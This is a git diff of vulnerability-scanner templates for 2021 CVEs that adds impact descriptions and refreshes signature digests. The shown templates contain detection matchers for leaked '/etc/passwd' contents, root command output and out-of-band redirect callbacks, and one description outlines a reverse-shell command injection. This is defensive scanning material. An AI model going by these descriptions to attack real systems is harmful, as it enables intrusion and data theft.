     Apply the latest firmware update provided by Hikvision to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a004730450221008a7885232c602dd782f4dc6ddd83c23573b06010a1962977b5ba9a22af530dc002200b57b782d59228034b46a0d661815ca25715aceec9ba934ea48188b200785076:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022047d95ae9b12efb108f2064bb9248d6f0a6552be9d02d751360acbf0be9fa3a8c022100c91a9c8d302b01a0ea829ae986049bd3c7b8c954b6f66545b571549f38888f7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml
index 1911d51fb8..47fb93397a 100644
--- a/http/cves/2021/CVE-2021-36380.yaml
+++ b/http/cves/2021/CVE-2021-36380.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a004730450220773e8b91e3f8447085566f322c310f12c06df6c455d4bd80719d88ec2d02c0cc022100f144c67679f2e47b73c1bf759f7c5610034d19fd3ef4175ec3ab5c61a1c31faf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200c6de6056af700f6afa8d8c2f0c974ce5eb973686c48c69b29638e02f0c5c33e02203c3bdb72332ea0773b7d17b5a161d9970f2a6440d2afc0587ffa834e495d735b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml
index 5d462a568e..0c8f245e85 100644
--- a/http/cves/2021/CVE-2021-36450.yaml
+++ b/http/cves/2021/CVE-2021-36450.yaml
@@ -5,6 +5,8 @@ info:
   author: atomiczsec
   severity: medium
   description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization.
   reference:
@@ -68,4 +70,4 @@ http:
           - 'csrfp_login=([a-zA-Z0-9]+);'
         internal: true
         part: header
-# digest: 4b0a00483046022100c7bc69c4b0da247b33094994f01f4bc3a7f0422bce054357f9f4b4235b19904f022100d24774a8d4af8fc466613457d393619f5ccf75c333a1650322187bd7f3c8fe49:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c825a2d4fcce34f8faffb258c3cf86812564a0acefdc3d93319a3ebacf43d9370220625aa73819fc900a21ef8e6a55e175b5d82cf185dc90f3f509ef3131ae658212:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml
index 92ce31fcdf..22f679e4c7 100644
--- a/http/cves/2021/CVE-2021-3654.yaml
+++ b/http/cves/2021/CVE-2021-3654.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application.
   reference:
@@ -43,4 +45,4 @@ http:
         status:
           - 302
           - 301
-# digest: 490a004630440220314c218270a38219b84032aee205ed8fe99273daee5db2c8462c4581624dab2402205452608251eca084e0ec1d205efe7d1e40d0c4f341b4fcb002aaf254596bec14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b37f670b0d6f625a0b2ec025faecaa4619fd7e375a104115e247e933054d7ec9022100e5d75d5e51ed600a856af0eff8f64b96ef985a0b07195176266ae11890890413:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml
index baa67f3121..a853cabdc8 100644
--- a/http/cves/2021/CVE-2021-36580.yaml
+++ b/http/cves/2021/CVE-2021-36580.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100d904c6af57b83429da7029c4476f69c4271cc42323214a038c071da72023825c022067e4937c1a486f6fc6d3e03fa3bdd1afd2257a3edb73dbbc5bf6650933352189:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e0d8c430dee840403555eb2d7f21671067398cf66abde5a1aa3f8380f5bb3c54022100f510ebfa9891313a24e10969091e4c8681c32af427eeb4b17b0013f90f6181d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml
index 7104892e7b..026400e007 100644
--- a/http/cves/2021/CVE-2021-36748.yaml
+++ b/http/cves/2021/CVE-2021-36748.yaml
@@ -5,6 +5,8 @@ info:
   author: whoever
   severity: high
   description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - "contains(tolower(header_2), 'index.php?controller=404')"
           - "len(body_2) == 0"
         condition: and
-# digest: 4a0a00473045022008dc62fb2b56ca8bfde841bc216a05364e74cdba59b24b198c874123865b127d02210082a3706a4608f4b60f640c19e7d37d9355e7c2384c00798c8e1e6fce893ca7a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c1ed0e9fbf6819dddd152bf3414004fde6474b60dcb601882303a962fc2e473402201d52d04689c55610593ff947aeb402027cedb1e9ed4473cb633a5faab73b3e7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml
index f9ec4e049e..6f3fab77db 100644
--- a/http/cves/2021/CVE-2021-36749.yaml
+++ b/http/cves/2021/CVE-2021-36749.yaml
@@ -5,6 +5,8 @@ info:
   author: _0xf4n9x_
   severity: medium
   description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Apache Druid to fix the LFI vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - "root:.*:0:0:"
           - "druid:*:1000:1000:"
         condition: or
-# digest: 4b0a0048304602210088dd0af256d507facb268834e9d4d6f0a70da118fdcc5d73e48323c0e2660dc2022100ed49b179de89d57fc07bfeba217773c91e9c8dd98c40ab35b0e86af9c1b3a9b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e319243d8bfe05db8385cd3429c6d5ef2806432688790d39f4116641669d81ba022100f11792d1344b813d8b9cd63b86a0a3b30855046f280dd02ec0362863f0279fb0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml
index 9c97f29e5e..63e2cc711c 100644
--- a/http/cves/2021/CVE-2021-37216.yaml
+++ b/http/cves/2021/CVE-2021-37216.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability.  Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
         part: header
         words:
           - "text/html"
-# digest: 4b0a00483046022100f0e2e9645fed5a6d4fa0bc476625adb7a17abba2340966a3ebb1cf73165d25de022100a338982609e6ee1e654d87803b87393278aed33d6b16180eb607bb5e1bcc958a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100efa403777704ccaf543fb5bf7fed3a5961a3e01061963aaa98a7d7664287832602202640c817022962fadd1a1bcb89fff74c13dccca4a57d410210ead7dc76b0be3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml
index 626c862cd3..28e7d10b45 100644
--- a/http/cves/2021/CVE-2021-37304.yaml
+++ b/http/cves/2021/CVE-2021-37304.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the application.
   remediation: |
     Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022033049b1ec1c61d9a86be01affd8b51606160dc5d6993028e199c4881e0392967022034254943135b785e681fe8df054385e8ccf93d7b65d63a9ae25a269db3cdd38f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a48ef1214d17da41a6ff963d3229a35ebfee7207b8e48fe09f8283a80266922b0220653fd803c7a2bc59d4cfffe9cc4994448b447df4d0a30d161e0e4368783c1e6b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml
index d18d03f088..02d20cff74 100644
--- a/http/cves/2021/CVE-2021-37305.yaml
+++ b/http/cves/2021/CVE-2021-37305.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage.
   remediation: |
     Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210099de14baa0e120fd29534b3472d5a0d0606031f8a1fd107327137984e2eb143e022100eca4955bcae2cc7da02b57522000856bd0a1fd20529280ee155999b909ef88b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207a927c552baf1addf4d11d29db0456359fd757e3084d4932e0a816288422a88b02207bb82a9556d123575ca454108d79c57478d3834b88519ecb0bf0e588ecc5ae86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml
index 5c93a6c0ca..131d54048c 100644
--- a/http/cves/2021/CVE-2021-37416.yaml
+++ b/http/cves/2021/CVE-2021-37416.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: medium
   description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
   remediation: |
     Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d3519185d51dbb67a3e686bd88e0583fee5c297228e47f8c283c987890dfe572022100a4cfb11b40aa2182671492d84ff82ddc0a415c5ae088e147f050bb1cfa5edea6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220372950f82201476c6de5f159959f5d9accbebaecb7aeb318dc5485755c78cb00022100d9797f2d1ec5fd242da9800c00013a026b376f396e8b079a19ca7179104f7a2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml
index 31c335f272..bf5406bb87 100644
--- a/http/cves/2021/CVE-2021-37538.yaml
+++ b/http/cves/2021/CVE-2021-37538.yaml
@@ -1,10 +1,12 @@
 id: CVE-2021-37538
 
 info:
-  name: PrestaShop SmartBlog <4.0.6- SQL Injection
+  name: PrestaShop SmartBlog <4.0.6 - SQL Injection
   author: whoever
   severity: critical
   description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.
+  impact: |
+    An attacker can gain unauthorized access to the database, extract sensitive information, modify data, or perform other malicious activities.
   remediation: |
     Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100dbfb8d25401b42b557cc0c5cf859cf8e4bf1161fd5bf8b3c5d1f76530913c536022100a15c9b7c8237f34f2540112f4291b8cfdbd2ecdc3c6bb5f515a5f074c27496cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200a45e8fb0edcbfa026241f17d4de6b58cd70e3e5ff42cf367b9afab7494694c2022035ad6687783e5ac7eca16a1691c9f522faad12b51b3f236b89115599addbd609:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml
index add85dea62..8355c00d5a 100644
--- a/http/cves/2021/CVE-2021-37573.yaml
+++ b/http/cves/2021/CVE-2021-37573.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4a0a0047304502202720141ef594acbb2ea9d3d58dc78b6e8f65aa186c9b7049e536d63a0b333c88022100888aef77063e6bbcf054a93dbc16152bd8b005eaf946f9ba4556732d915ac0f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008a653512b605f61555b98fe8550b15cd91fd178aa25d308c496960fe16e734b402201b3a9d9890d555c63095973f0d11c62728db2e22f37f2916aa68b37eb1fefa28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml
index c0ffe56e0c..e7fb53de92 100644
--- a/http/cves/2021/CVE-2021-37580.yaml
+++ b/http/cves/2021/CVE-2021-37580.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential compromise of the entire Apache ShenYu system.
   remediation: |
     Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b0128bed13fbc85fde4bcafd0dbc463c64c4e60fced0573610ee90e5ece333070220326228fbfeccc0082b870685f8146e0e03876a7b059e80b693c655ccb0fe0d8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f36db9b377ec5914c512e1acd755b50a1105fb3f693e73006028f5d96d4842ad022100c28e1d3a36897366b0d663b40ffe1125a699e7e6ff1e7d04553f40c35b38ff1f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml
index b171189407..1c93bada20 100644
--- a/http/cves/2021/CVE-2021-37589.yaml
+++ b/http/cves/2021/CVE-2021-37589.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Virtua Cobranca before 12R allows blind SQL injection on the login page.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying system.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R.
   reference:
@@ -61,4 +63,4 @@ http:
       - type: dsl
         dsl:
           - "status_code_2 == 500 && status_code_3 == 200"
-# digest: 490a0046304402200e3feb0c49b364fa6b4f79f562c76411b7f9f23cd52a69c183d6b1778794937602201b458ff132f12133ebd3521eaa6fbb7fcac214d206355de6e32256f6356ff893:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204698b755af598464503a4cb230152a58c5a5143fc8554acf299b0e26378c845002204a7fad062507a5b07a34e7fe1334622a44177f5b206a77edac14dcda405fd6e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml
index de8b1e49db..789775bc50 100644
--- a/http/cves/2021/CVE-2021-37704.yaml
+++ b/http/cves/2021/CVE-2021-37704.yaml
@@ -5,6 +5,8 @@ info:
   author: whoever
   severity: medium
   description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
+  impact: |
+    An attacker can gain access to sensitive information, such as server configuration details, PHP version, and installed extensions.
   remediation: |
     Remove or restrict access to the phpinfo.php file in the phpfastcache library.
   reference:
@@ -53,4 +55,4 @@ http:
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
         part: body
-# digest: 4a0a0047304502200562d470363aa4f6b9b8c386e2191bc47d6be58e78bdcbeaae8c7bb13e1357b202210093abcbd4f5f6394cf9aa06ba597b64bab38b262f6286d2a07e6289f3ac5d5b94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022020630fb146aee7b9480afe29d4aa7a43ddfd0f9d9b6aa5ff306630cc380691c602202e7994db5eace4dd37920cecfaef7576d061bc39186cb24516d2eee800694792:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml
index 6ddafe0491..6a6615ba4c 100644
--- a/http/cves/2021/CVE-2021-37833.yaml
+++ b/http/cves/2021/CVE-2021-37833.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205b3e1488a93cea4d0c3e71757dcb0b62db7395f5807affc59322a646c5493f0502210082a8ae8f047346022f83771ef65202c2ad24863dcc0eeb012fa7a345141c900a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022047d0a439e4460aad13c021a934ee9a2b1d53bd40c69832eaefe4f38b5c01d26b02202036eacc40bc586787016aa5ca7d8c8191d6cb1adff156888510731d301f80e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml
index 9ab1d34622..00c1eedd96 100644
--- a/http/cves/2021/CVE-2021-38314.yaml
+++ b/http/cves/2021/CVE-2021-38314.yaml
@@ -5,6 +5,8 @@ info:
   author: meme-lord
   severity: medium
   description: WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
   remediation: |
     Update WordPress Redux Framework to version 4.2.12 or later.
   reference:
@@ -61,4 +63,4 @@ http:
         regex:
           - '[a-f0-9]{32}'
         part: body
-# digest: 490a00463044022068a9c15307b035436037fa4eddc1ea4c07fbfc61ebf04b95a79a492c32465ce502205d0eee5abe0f929b57d1878184b640a5135ae7a5c6d0580e68e7f1aadd644cf5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d6ea1b05d3167e0c77c50507eb0f72c6b9f1085cb95ccc74012770a43de7a0fe022100daf8b9e1cd9d5c4fd53a479d4ff7ca1f869d89f8f9cf9c25c5eb330eb77dab68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml
index d5eb23e36d..5e6ff91269 100644
--- a/http/cves/2021/CVE-2021-38540.yaml
+++ b/http/cves/2021/CVE-2021-38540.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.
+  impact: |
+    An attacker can exploit this vulnerability to import malicious variables, potentially gaining unauthorized access to sensitive data.
   remediation: Upgrade to Apache Airflow 2.1.3 or higher.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-38540
@@ -74,4 +76,4 @@ http:
         regex:
           - type="hidden" value="(.*?)">
         internal: true
-# digest: 4a0a00473045022100f8198ea04513b84ac0e086919783bb3f8d4a0a96173003f1a4d0e3a3b8ffa88402206a4ef00cc06a67c60736a8dd57ceb50b698f2d63d36ac4011508d3095345cc7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022048d2cdedab5e3a7473536cbbc02476843da6b763b6000dc8591481ba31447850022100a1c625786182a2af2a19c479494ff271ce79fa4f848aa18ca6a9400276fb8b04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml
index 2b520b5cfb..1fdc547ef5 100644
--- a/http/cves/2021/CVE-2021-38647.yaml
+++ b/http/cves/2021/CVE-2021-38647.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo,xstp
   severity: critical
   description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges.
   remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.
   reference:
     - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
@@ -75,4 +77,4 @@ http:
           - '<p:StdOut>'
           - 'uid=0(root) gid=0(root) groups=0'
         condition: and
-# digest: 4b0a00483046022100bd87709dc86384413bda35664efe0a76557cccc9e5d25f4a3d7c8549b4b75a14022100deea30799efd608c32531c07df770ecc026f3c2c11b32060db35c53ec6707470:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c9daf477b8edec421c2847da39dbf690f4a1ecd06e7bec770e6309d50a766f4f022100ba1b135f667f082289f28c448e6d894bc130e7bb74bd21f0d775562fa491a0f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml
index 4a98653107..cc2d6fd28b 100644
--- a/http/cves/2021/CVE-2021-38702.yaml
+++ b/http/cves/2021/CVE-2021-38702.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220180869f00d26bc3424eaa2b5ff16d7e6d5d95371dfb888c00e1af948dab454630220453e0357a83006c2c94c0d4edd761c38736e8950414873f766b7eb40ae164922:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100927fa7b29cb270293ca7da0c986bdad12cf73e8b13d0f9a81e501ea57abc044302202ad3ece4d8552aa99490b621f73d14675949b5d1dfa304ef8b2a1e9c85ad6a80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml
index 936044cef8..395b559e80 100644
--- a/http/cves/2021/CVE-2021-38704.yaml
+++ b/http/cves/2021/CVE-2021-38704.yaml
@@ -5,6 +5,8 @@ info:
   author: alph4byt3
   severity: medium
   description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f08b211d8da6e3602158910b3b14c057fae196f3d6ed7160771d4101e391452b022100ae6aeeb0f61fd2285e8043bedb9355620cabffedfc15c8bd5327a96499883c28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d7139c7b8c010659ced5bcacef9faf4843783fd29a80e3c5c4a3ef32fee7d02022022df4cb761d2e0d2cc65de46ecae1fca9af5f28eed00d498879ae50542552021:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml
index 70e815e6cd..feaa3038bc 100644
--- a/http/cves/2021/CVE-2021-38751.yaml
+++ b/http/cves/2021/CVE-2021-38751.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: medium
   description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM.
+  impact: |
+    An attacker can manipulate the Host header to perform various attacks, including phishing, session hijacking, and cache poisoning.
   remediation: |
     Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f0b7af0927b62d5e77d8ab116ac68ff43d4bade20f433ab64c55515cfa6f8f910221008133d13b514582470047cab99580db87de111e853b1bb636506d529bf25d53ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100926774743cd127219b9f78ad9b62179f19421e814113eaaa66e505b62d1aa3d3022035ddc6ae01b65ef319a34df931ff2e2139291941db7bbc6205756a42ef47c62c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml
